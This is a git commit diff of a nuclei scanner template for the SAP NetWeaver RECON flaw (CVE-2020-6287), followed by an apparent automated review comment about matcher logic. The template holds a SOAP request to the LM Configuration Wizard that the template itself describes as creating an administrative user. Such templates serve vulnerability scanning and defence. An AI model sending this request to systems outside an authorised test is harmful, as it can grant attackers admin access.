Improved matchers for CVE-2020-6287
parent
91b33eb6a5
commit
55c0e1b103
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-6287
|
||||
|
||||
info:
|
||||
name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
|
||||
name: Remotely Exploitable Code On NetWeaver
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
tags: cve,cve2020,sap
|
||||
|
@ -11,6 +11,7 @@ info:
|
|||
- https://launchpad.support.sap.com/#/notes/2934135
|
||||
- https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
|
||||
- https://www.onapsis.com/recon-sap-cyber-security-vulnerability
|
||||
- https://github.com/chipik/SAP_RECON
|
||||
|
||||
requests:
|
||||
- payloads:
|
||||
|
@ -23,12 +24,16 @@ requests:
|
|||
Connection: close
|
||||
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('§data§')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "urn:CTCWebServiceSi"
|
||||
- "CTCWebServiceSi"
|
||||
- "SOAP-ENV"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
@ -36,4 +41,5 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- "text/xml"
|
||||
- "SAP NetWeaver Application Server"
|
||||
part: header
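Review bot: The header matcher in the last hunk lists `"text/xml"` and `"SAP NetWeaver Application Server"` with no `condition:` key, and nuclei word matchers default to `or`, so either string alone satisfies it. The banner word, which appears to be the line this hunk adds, therefore does not narrow the match. Any 200 response with a `text/xml` content type and the two body words still passes. If both are meant to be required, add `condition: and` after `part: header`, as the body matcher does. Requiring the banner would, however, miss hosts that hide or rewrite the `Server` header, so document whichever choice is intended in a comment above the matcher. The hunk range suggests the file ends at `part: header`, but the page does not show the file header, so confirm nothing follows.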
|